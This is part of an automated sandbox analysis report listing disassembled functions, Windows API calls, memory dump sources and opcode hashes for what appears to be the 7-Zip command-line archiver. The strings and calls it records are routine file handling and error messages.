                                                                                                                                                                                                Function 0096C9CC Relevance: 6.3, APIs: 5, Instructions: 36COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: c213d67050506c93901002ddd1084c0dd65243c9eb9d617befeb87ee319482a8
                                                                                                                                                                                                • Instruction ID: 4f87574ee230dc6ab888546c2699cdb56227622df0572dd74a77c08e1cb4d011
                                                                                                                                                                                                • Opcode Fuzzy Hash: c213d67050506c93901002ddd1084c0dd65243c9eb9d617befeb87ee319482a8
                                                                                                                                                                                                • Instruction Fuzzy Hash: BFF090537059D489CA24EF66DD916682364BF9ABE879C0171FF1E47755EE20C8928300
                                                                                                                                                                                                Function 00952A84 Relevance: 6.3, APIs: 5, Instructions: 36COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 99aac3ebba39b973ad56ba9f7cc64fb651a8512a5e29eea15e4582f1b066fd79
                                                                                                                                                                                                • Instruction ID: 3760f03b219338ff705197559c3b80e9ca99325dd59bf5f3d82439466fff2adc
                                                                                                                                                                                                • Opcode Fuzzy Hash: 99aac3ebba39b973ad56ba9f7cc64fb651a8512a5e29eea15e4582f1b066fd79
                                                                                                                                                                                                • Instruction Fuzzy Hash: C0F0302371598489CB29EF37DD516686364FFDAFD57590161BF2D4B399DE20C8828340
                                                                                                                                                                                                Function 0096CA3C Relevance: 6.3, APIs: 5, Instructions: 36COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: f7456f4712a6592163503973d257ef0995b2ed4d21bfa0f5baa221aafdf9fe8c
                                                                                                                                                                                                • Instruction ID: d836368037ff4ca144ad8858dfb8ffe4c1e0401510fea884d9f8c50cb8e4118f
                                                                                                                                                                                                • Opcode Fuzzy Hash: f7456f4712a6592163503973d257ef0995b2ed4d21bfa0f5baa221aafdf9fe8c
                                                                                                                                                                                                • Instruction Fuzzy Hash: C5F09093B119C48ECB14EF66DC817682364BF99BA9B9C4171BF2D07755DE20C8D28340
                                                                                                                                                                                                Function 00987690 Relevance: 6.3, APIs: 5, Instructions: 22COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • free.MSVCRT ref: 009876AF
                                                                                                                                                                                                • free.MSVCRT ref: 009876BB
                                                                                                                                                                                                • free.MSVCRT ref: 009876C7
                                                                                                                                                                                                • free.MSVCRT ref: 009876D3
                                                                                                                                                                                                  • Part of subcall function 0098B310: free.MSVCRT ref: 0098B335
                                                                                                                                                                                                  • Part of subcall function 0098B310: free.MSVCRT ref: 0098B342
                                                                                                                                                                                                  • Part of subcall function 0098B310: free.MSVCRT ref: 0098B34E
                                                                                                                                                                                                  • Part of subcall function 0098B310: free.MSVCRT ref: 0098B358
                                                                                                                                                                                                  • Part of subcall function 0098B310: free.MSVCRT ref: 0098B362
                                                                                                                                                                                                  • Part of subcall function 0098B310: free.MSVCRT ref: 0098B36C
                                                                                                                                                                                                  • Part of subcall function 0098B310: free.MSVCRT ref: 0098B376
                                                                                                                                                                                                  • Part of subcall function 0098B310: free.MSVCRT ref: 0098B380
                                                                                                                                                                                                • free.MSVCRT ref: 009876E4
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                • Opcode ID: 80021553301d9a40d6bbe7854cc860826636cb7fafc5824219d75b22b7ddba10
                                                                                                                                                                                                • Instruction ID: db4d678b39a64d1170760718e40439e8774b80d33b8e97db98009337e1805d36
                                                                                                                                                                                                • Opcode Fuzzy Hash: 80021553301d9a40d6bbe7854cc860826636cb7fafc5824219d75b22b7ddba10
                                                                                                                                                                                                • Instruction Fuzzy Hash: 93E0C93221598081CA54FF75C8956EC23A0FBDDB58F580171BA2E8E366DE10C9838350
                                                                                                                                                                                                Function 009802F0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionThrow$memmove
                                                                                                                                                                                                • String ID: Internal collision in update action set
                                                                                                                                                                                                • API String ID: 265668421-2378581463
                                                                                                                                                                                                • Opcode ID: 2489d0cffbcfc2a2b50f9be8098032778b6c83d9b82680e9d68b7dd3d3502d6c
                                                                                                                                                                                                • Instruction ID: d32b21508b6b6625a6d1fee2f01a2c86285202a4d8707d8b8c199b5556e9e49b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2489d0cffbcfc2a2b50f9be8098032778b6c83d9b82680e9d68b7dd3d3502d6c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 434123333096858ADB65EB2AE45476E7750F7C978CF04811AEF8903B69EB78D549CB00
                                                                                                                                                                                                Function 00984594 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID: =
                                                                                                                                                                                                • API String ID: 1294909896-2525689732
                                                                                                                                                                                                • Opcode ID: 40c11fba967689670f12ed8931cb4eba44630f327dd0b6864abb2cd98b0bc6cc
                                                                                                                                                                                                • Instruction ID: 84b165439098b9c68bdefec959b6b284b0a3f30eebd10e71ca60d8503c5aa877
                                                                                                                                                                                                • Opcode Fuzzy Hash: 40c11fba967689670f12ed8931cb4eba44630f327dd0b6864abb2cd98b0bc6cc
                                                                                                                                                                                                • Instruction Fuzzy Hash: F231E763319A8196CB10EF55E49075FB720FBD67A0F944222FB8E43B68EB78C945CB00
                                                                                                                                                                                                Function 00976D5C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • free.MSVCRT ref: 00976E91
                                                                                                                                                                                                  • Part of subcall function 00943518: free.MSVCRT ref: 00943551
                                                                                                                                                                                                  • Part of subcall function 00943314: memmove.MSVCRT ref: 00943339
                                                                                                                                                                                                • free.MSVCRT ref: 00976E83
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                • String ID: exe
                                                                                                                                                                                                • API String ID: 1534225298-1801697008
                                                                                                                                                                                                • Opcode ID: 76770eb1b0aff3fcbaddab3083a3c2637205f7744bad9aa1b7e03b28f3d0466f
                                                                                                                                                                                                • Instruction ID: 48754028943b0ee40d912353fc1ed4d2648021ef3c863efb1e790f0168a02c57
                                                                                                                                                                                                • Opcode Fuzzy Hash: 76770eb1b0aff3fcbaddab3083a3c2637205f7744bad9aa1b7e03b28f3d0466f
                                                                                                                                                                                                • Instruction Fuzzy Hash: D8317623304941A6CE30EB25E84069EB730F7C57D4F849212FB9E47679DF28D68ACB00
                                                                                                                                                                                                Function 00969380 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$ByteStringmemmove
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 400576877-0
                                                                                                                                                                                                • Opcode ID: 627be9a5ab345c6a2ae9b3d4a8fa1f013a1db37638386f1ebadb93c6192a02ff
                                                                                                                                                                                                • Instruction ID: 010f85736d777772eb9342aeccf7aa32c7fba8e22f1b0dbf91de92751549499e
                                                                                                                                                                                                • Opcode Fuzzy Hash: 627be9a5ab345c6a2ae9b3d4a8fa1f013a1db37638386f1ebadb93c6192a02ff
                                                                                                                                                                                                • Instruction Fuzzy Hash: 23219263305B9092EB249F51E9907696268FB887E4F484625EFAE4B7A4DF7CC856C300
                                                                                                                                                                                                Function 00969644 Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$wcscmp
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 4021281200-0
                                                                                                                                                                                                • Opcode ID: 0bac5f4983b55f5b0d32204177355077f18131e63a01caf0778d328eb0156594
                                                                                                                                                                                                • Instruction ID: 4296efa40f386b7b0dee52de3f4102bf78201a1cda32f023f64c0f92319f6be1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0bac5f4983b55f5b0d32204177355077f18131e63a01caf0778d328eb0156594
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4621017631474082CB20EF26E4407697368FBC9BE4F545321EE6A477A4EF38C586DB00
                                                                                                                                                                                                Function 0094FADC Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                • String ID: Unsupported charset:
                                                                                                                                                                                                • API String ID: 1294909896-616772432
                                                                                                                                                                                                • Opcode ID: 9e42c2d2b4e1f7d5b703db533c77dc73d7d9a80e6522a8e966b0da96d7856300
                                                                                                                                                                                                • Instruction ID: c6d2e9700bec407b1a8cdc0b5970df673d500397a0893d41b716cb0300a9d37a
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e42c2d2b4e1f7d5b703db533c77dc73d7d9a80e6522a8e966b0da96d7856300
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8121B66360464192DB20DF18D8A0B9D7721F7C57E4F944222FBAD077B5CF68C986C740
                                                                                                                                                                                                Function 00946D48 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00947D4C: GetFileAttributesW.KERNELBASE ref: 00947D6E
                                                                                                                                                                                                  • Part of subcall function 00947D4C: GetFileAttributesW.KERNEL32 ref: 00947DA5
                                                                                                                                                                                                  • Part of subcall function 00947D4C: free.MSVCRT ref: 00947DB2
                                                                                                                                                                                                • DeleteFileW.KERNEL32 ref: 00946D90
                                                                                                                                                                                                • DeleteFileW.KERNEL32 ref: 00946DCA
                                                                                                                                                                                                • free.MSVCRT ref: 00946DDA
                                                                                                                                                                                                • free.MSVCRT ref: 00946DE8
                                                                                                                                                                                                  • Part of subcall function 009468A0: SetFileAttributesW.KERNELBASE ref: 009468C7
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: File$Attributesfree$Delete
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 324319583-0
                                                                                                                                                                                                • Opcode ID: 9ea681c350cecb0b42c71b1f35ea49690d0665b5843397cde649d2af5f6ea4c4
                                                                                                                                                                                                • Instruction ID: b6acb96e39e66bc17be9f3bcd70fde0337a6ce2118e2d5fb40b7aec41630e598
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ea681c350cecb0b42c71b1f35ea49690d0665b5843397cde649d2af5f6ea4c4
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5D019662B44A0041CE34AF34EC51B6953245FC77F4F5C1321ADBE873E5EE28C9968702
                                                                                                                                                                                                Function 0095211C Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00952137
                                                                                                                                                                                                • free.MSVCRT ref: 009521BB
                                                                                                                                                                                                  • Part of subcall function 00946618: FormatMessageW.KERNEL32 ref: 00946676
                                                                                                                                                                                                  • Part of subcall function 00946618: LocalFree.KERNEL32 ref: 00946698
                                                                                                                                                                                                  • Part of subcall function 0094362C: memmove.MSVCRT ref: 00943659
                                                                                                                                                                                                • free.MSVCRT ref: 00952182
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: free$ErrorFormatFreeLastLocalMessagememmove
                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                • API String ID: 1743135865-3653984579
                                                                                                                                                                                                • Opcode ID: 0bd9cf6b41112b825cc91f2e3a5d39e6d602e68f921f465e2c8b822415a3c1c2
                                                                                                                                                                                                • Instruction ID: f78059791c1190ecd5a7e194c1e05c6e2fb4969656c552330cd3c4f2fcbf8b64
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0bd9cf6b41112b825cc91f2e3a5d39e6d602e68f921f465e2c8b822415a3c1c2
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1501A95330490090CA20EB25E84175E6721EBC9BF4F955321BE5E477B9DE28CA86C740
                                                                                                                                                                                                Function 0094C878 Relevance: 6.0, APIs: 4, Instructions: 49fileCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 2244327787-0
                                                                                                                                                                                                • Opcode ID: e021971f243c9fea39bb415f90c700eab78ade398cc3b993660b20944e3800b0
                                                                                                                                                                                                • Instruction ID: 414f77b545534c6f979dc1f7efdac42f5db1d6384c21c7b7b09883d47c72b824
                                                                                                                                                                                                • Opcode Fuzzy Hash: e021971f243c9fea39bb415f90c700eab78ade398cc3b993660b20944e3800b0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C01F2627250609FD7215F3EDC04B696298B709BE6F909131FE4ACBB50DA28CC818780
                                                                                                                                                                                                Function 0098ACDC Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: fputs
                                                                                                                                                                                                • String ID: Break signaled$ERROR: Can't allocate required memory!$System ERROR:
                                                                                                                                                                                                • API String ID: 1795875747-932691680
                                                                                                                                                                                                • Opcode ID: adcba0a3c55dea3e12b275e3b9947d53b3d55053ca3c8ce761ccfc27961a96f0
                                                                                                                                                                                                • Instruction ID: 62a7fb25c4c74f38f6a8d711cc24d97377ead72095e8f188cbf4f06debae663b
                                                                                                                                                                                                • Opcode Fuzzy Hash: adcba0a3c55dea3e12b275e3b9947d53b3d55053ca3c8ce761ccfc27961a96f0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 18015E61242904DAEB08FF20E8407A82334E796795FC09423EA0E877B6DF3CCD85C382
                                                                                                                                                                                                Function 0094695C Relevance: 6.0, APIs: 4, Instructions: 42COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646353354.0000000000940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646526575.000000000098F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646593172.00000000009AC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                • Associated: 0000001B.00000002.2646641269.00000000009AF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_27_2_940000_7z.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: DirectoryRemovefree
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 736856642-0
                                                                                                                                                                                                • Opcode ID: efb7360f27999ac7bd03661593c0501c8d3dd599b59c9a8bab47d3410f2a5fdb
                                                                                                                                                                                                • Instruction ID: 65433f050d6553f6109162cc6f3aed4d121f72f853b427874a8819a3abe35ef8
                                                                                                                                                                                                • Opcode Fuzzy Hash: efb7360f27999ac7bd03661593c0501c8d3dd599b59c9a8bab47d3410f2a5fdb
                                                                                                                                                                                                • Instruction Fuzzy Hash: 61F0A4A721864081D930AF21D99073D5364ABCB7F4F484321AEB9877A5CF69C98AC701
                                                                                                                                                                                                Function 00942EF4 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _CxxThrowException.MSVCRT ref: 00942F5B
                                                                                                                                                                                                  • Part of subcall function 00942130: malloc.MSVCRT ref: 00942134
                                                                                                                                                                                                  • Part of subcall function 00942130: _CxxThrowException.MSVCRT ref: 0094214F
                                                                                                                                                                                                • memmove.MSVCRT(?,Unsupported switch postfix -stm,00000000,0094302B,?,?,?,?,00943698), ref: 00942F2C
                                                                                                                                                                                                • free.MSVCRT ref: 00942F34
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • Unsupported switch postfix -stm, xrefs: 00942EF6
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 0000001B.00000002.2646412783.0000000000941000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00940000, based on PE: true
